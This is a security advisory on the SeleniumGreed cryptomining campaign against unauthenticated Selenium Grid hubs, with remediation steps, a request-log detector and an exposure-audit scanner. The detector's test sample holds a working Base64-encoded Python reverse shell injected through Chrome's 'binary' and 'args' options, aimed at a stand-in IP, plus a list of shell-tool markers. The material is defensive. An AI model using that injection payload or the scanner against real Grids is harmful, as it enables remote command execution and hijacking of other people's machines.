Ongoing Cyberattack Targets Exposed Selenium Grid Services for Crypto Mining

Summary:
Cybersecurity experts are warning about an ongoing campaign exploiting internet-exposed Selenium Grid services for unauthorized cryptocurrency mining. Wiz, a cloud security firm, is tracking this activity as SeleniumGreed, which has been targeting outdated Selenium versions (3.141.59 and earlier) since April 2023.

Wiz researchers Avigayil Mechtinger, Gili Tikochinski, and Dor Laska highlighted that the Selenium WebDriver API enables full machine interaction, including file manipulation and remote command execution. By default, this service lacks authentication, leaving many public instances misconfigured and open to abuse. Selenium Grid, part of the Selenium testing framework, allows parallel test execution across multiple environments. However, project maintainers emphasize that it must be protected from external access with appropriate firewall settings to prevent unauthorized actions.

The attackers target publicly exposed Selenium Grid instances and use the WebDriver API to run Python code that downloads and executes an XMRig miner. The chain starts with a request to the exposed hub that executes a Base64-encoded payload; that payload opens a reverse shell, which then fetches the XMRig binary from an attacker-controlled server. The miner is modified so that its pool IP is generated at runtime, and XMRig's TLS-fingerprint feature is configured so the miner communicates exclusively with the attackers' servers. The attacker-controlled IP address is itself a compromised host that also runs a publicly exposed Selenium Grid instance.
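One place to catch this chain is the hub's own request log: the new-session request that starts it has to arrive over the unauthenticated WebDriver API. The detector below is an added example, not code from the advisory, Wiz or the Selenium project. It assumes the abuse takes the shape the paragraph describes, a new-session request whose browser options repoint the `binary` at an interpreter and hand it inline, often Base64-encoded, code; the allowed browser paths, the log-line format and all sample requests are constructed for the example.

```python
"""Flag suspicious Selenium Grid new-session requests (added example, constructed samples)."""
import base64
import binascii
import json
import re

# Browser executables a legitimate node is expected to launch (assumed paths).
ALLOWED_BINARY_PREFIXES = ("/usr/bin/chrom", "/usr/bin/google-chrome",
                           "/opt/google/chrome/", "/usr/bin/firefox", "/usr/lib/firefox/")
INTERPRETER = re.compile(r"(^|/)(python[0-9.]*|perl|ruby|node|bash|sh)$")
SHELL_MARKERS = ("socket", "subprocess", "os.dup2", "pty.spawn", "/dev/tcp", "nc ", "curl ", "wget ")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
VENDOR_OPTIONS = ("goog:chromeOptions", "moz:firefoxOptions", "ms:edgeOptions")


def decode_base64_blobs(text):
    """Decode every Base64-looking run in text; runs that are not valid Base64 are skipped."""
    decoded = []
    for blob in B64_BLOB.findall(text):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "ignore"))
        except (binascii.Error, ValueError):
            continue
    return decoded


def capability_sets(body):
    """Yield each capability dict in a W3C or legacy (Selenium 3) new-session body."""
    caps = body.get("capabilities", {})
    yield caps.get("alwaysMatch", {})
    for first in caps.get("firstMatch", []):
        yield first
    if "desiredCapabilities" in body:
        yield body["desiredCapabilities"]


def analyze_new_session(body):
    """Return human-readable findings for one POST /session JSON body ([] if clean)."""
    findings = []
    for caps in capability_sets(body):
        for key in VENDOR_OPTIONS:
            opts = caps.get(key)
            if not isinstance(opts, dict):
                continue
            binary = opts.get("binary")
            if binary and not binary.startswith(ALLOWED_BINARY_PREFIXES):
                findings.append(f"{key}.binary is not a known browser: {binary}")
            if binary and INTERPRETER.search(binary):
                findings.append(f"{key}.binary is an interpreter: {binary}")
            args = [str(a) for a in opts.get("args", [])]
            if any(a in ("-c", "-e") for a in args):
                findings.append(f"{key}.args passes inline code: {' '.join(args)[:80]}")
            # Look for reverse-shell markers both in the raw args and inside decoded Base64.
            for text in [" ".join(args)] + decode_base64_blobs(" ".join(args)):
                hits = [m for m in SHELL_MARKERS if m in text]
                if hits:
                    findings.append(f"{key}.args contains shell/network markers: {hits}")
                    break
    return findings


def scan_requests(lines):
    """Run analyze_new_session over JSON log lines shaped like
    {"method": ..., "path": ..., "body": {...}} (assumed format); return [(line_no, findings)]."""
    hits = []
    for n, line in enumerate(lines, 1):
        try:
            rec = json.loads(line)
        except ValueError:
            continue
        if rec.get("method") != "POST" or not rec.get("path", "").endswith("/session"):
            continue
        findings = analyze_new_session(rec.get("body", {}))
        if findings:
            hits.append((n, findings))
    return hits


# Constructed samples: a normal headless Chrome session and an abusive one.
SAMPLE_BENIGN = {"capabilities": {"alwaysMatch": {
    "browserName": "chrome",
    "goog:chromeOptions": {"args": ["--headless=new", "--window-size=1280,800"]}}}}
_PAYLOAD = ("import socket,subprocess,os;s=socket.socket();s.connect(('198.51.100.10',4444));"
            "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);subprocess.call(['/bin/sh','-i'])")
SAMPLE_MALICIOUS = {"capabilities": {"alwaysMatch": {
    "browserName": "chrome",
    "goog:chromeOptions": {
        "binary": "/usr/bin/python3",
        "args": ["-c", "import base64;exec(base64.b64decode('%s'))"
                 % base64.b64encode(_PAYLOAD.encode()).decode()]}}}}
SAMPLE_LOG = [
    json.dumps({"method": "GET", "path": "/status", "body": {}}),
    json.dumps({"method": "POST", "path": "/wd/hub/session", "body": SAMPLE_MALICIOUS}),
    json.dumps({"method": "POST", "path": "/wd/hub/session", "body": SAMPLE_BENIGN}),
]

if __name__ == "__main__":
    for line_no, findings in scan_requests(SAMPLE_LOG):
        print(f"line {line_no}:")
        for finding in findings:
            print("  -", finding)
```

Tune `ALLOWED_BINARY_PREFIXES` to the browser images your nodes actually run; on a Grid that never legitimately sets `binary`, the simpler rule "any `binary` at all is a finding" is stricter and still cheap.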


Security Officer Comments:
Wiz noted that newer Selenium versions are also exploitable through the same unauthenticated WebDriver API and identified more than 30,000 internet-exposed instances that allow remote command execution, underscoring the urgency of correcting these misconfigurations. Selenium Grid's default lack of authentication is a severe risk whenever the service is deployed on a machine with a public IP address and without adequate firewall policies.


Suggested Corrections:

To protect your organization from this type of attack, consider taking the following steps:
  • Run both an external network scanner and a vulnerability scanner to map which Selenium Grid instances are reachable from the internet and which run outdated versions.
  • Deploy runtime detection on the hosts and containers that run Selenium nodes so that activity such as a node spawning a shell or a miner is caught as it happens.
  • Apply network security controls, such as a firewall, to restrict network access:
    • Inbound: Allow only trusted IP ranges to access the service.
    • Outbound: Allow outgoing traffic only to required endpoints; this also stops a compromised node from fetching the miner or reaching its pool.
  • Enable basic authentication on Selenium Grid instances (Selenium Grid 4 supports this through the router's --username and --password options); see the Wiz write-up linked below for remediation steps.
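The first and last bullets can be checked from outside the network with a small probe: an exposed Grid answers an unauthenticated status request with its JSON status document, while a Grid with basic authentication answers 401. The script below is an added example, not code from the advisory or Wiz's tooling. The JSON shapes it looks for (a `value.ready` flag, `value.build.version` on Selenium 3 hubs, per-node `version` entries on Selenium 4) are assumptions about the status documents, and the host names and responses are constructed so the audit runs offline; point `audit()` at real hosts with the default `fetch` to run it for real.

```python
"""Audit Selenium Grid exposure the way an external scanner would (added example)."""
import json
import urllib.error
import urllib.request

STATUS_PATHS = ("/status", "/wd/hub/status")   # Grid 4 and legacy hub paths (assumed)
LAST_TARGETED_VERSION = (3, 141, 59)            # "3.141.59 and earlier" per the advisory


def parse_version(text):
    """'3.141.59' -> (3, 141, 59); suffixes such as '-SNAPSHOT' are ignored."""
    parts = []
    for piece in str(text).split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        if not digits:
            break
        parts.append(int(digits))
    return tuple(parts)


def grid_versions(status_doc):
    """Collect version strings from a status document (hub build or node entries)."""
    value = status_doc.get("value", {})
    versions = set()
    build = value.get("build")
    if isinstance(build, dict) and build.get("version"):
        versions.add(str(build["version"]))
    for node in value.get("nodes") or []:
        if isinstance(node, dict) and node.get("version"):
            versions.add(str(node["version"]))
    return sorted(versions)


def classify_grid_response(status, body):
    """Return (verdict, notes) for an unauthenticated GET of a status path."""
    if status is None:
        return "UNREACHABLE", []
    if status == 401:
        return "AUTH_REQUIRED", []       # basic auth is enforced: the desired state
    if status != 200:
        return "NOT_GRID", []
    try:
        doc = json.loads(body)
    except ValueError:
        return "NOT_GRID", []
    value = doc.get("value") if isinstance(doc, dict) else None
    if not isinstance(value, dict) or "ready" not in value:
        return "NOT_GRID", []
    notes = []
    for version in grid_versions(doc):
        if parse_version(version) <= LAST_TARGETED_VERSION:
            notes.append(f"outdated Selenium {version} (targeted by SeleniumGreed)")
    return "EXPOSED_NO_AUTH", notes


def fetch(url, timeout=5):
    """GET url with no credentials; return (status, body), or (None, '') if unreachable."""
    request = urllib.request.Request(url, headers={"Accept": "application/json"})
    try:
        with urllib.request.urlopen(request, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, ""
    except (urllib.error.URLError, OSError):
        return None, ""


def audit(hosts, port=4444, fetcher=fetch):
    """Probe each host on the default Grid port; return {host: (verdict, notes)}."""
    results = {}
    for host in hosts:
        verdict, notes = "NOT_GRID", []
        for path in STATUS_PATHS:
            status, body = fetcher(f"http://{host}:{port}{path}")
            verdict, notes = classify_grid_response(status, body)
            if verdict != "NOT_GRID":
                break
        results[host] = (verdict, notes)
    return results


# Constructed responses standing in for live hosts so the audit runs offline.
GRID4_STATUS = json.dumps({"value": {"ready": True, "message": "Selenium Grid ready.",
                                     "nodes": [{"id": "n1", "uri": "http://10.0.0.5:5555",
                                                "version": "4.22.0"}]}})
GRID3_STATUS = json.dumps({"status": 0, "value": {"ready": True, "message": "Hub has capacity",
                                                  "build": {"version": "3.141.59"}}})
FAKE_RESPONSES = {
    "http://hub-a.example:4444/status": (200, GRID4_STATUS),
    "http://hub-b.example:4444/status": (404, ""),
    "http://hub-b.example:4444/wd/hub/status": (200, GRID3_STATUS),
    "http://hub-c.example:4444/status": (401, ""),
}


def fake_fetch(url, timeout=5):
    return FAKE_RESPONSES.get(url, (None, ""))


if __name__ == "__main__":
    hosts = ["hub-a.example", "hub-b.example", "hub-c.example", "hub-d.example"]
    for host, (verdict, notes) in audit(hosts, fetcher=fake_fetch).items():
        print(host, verdict, *notes)
```

Anything reported as EXPOSED_NO_AUTH is reachable without credentials from wherever the probe ran; treat that as the finding regardless of version, since newer Grids are exploitable through the same API. Run the probe from outside the trusted IP ranges the firewall allows, otherwise it only confirms that the allowlist works for you.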

Link(s):
https://thehackernews.com/2024/07/ongoing-cyberattack-targets-exposed.html


https://www.wiz.io/blog/seleniumgreed-cryptomining-exploit-attack-flow-remediation-steps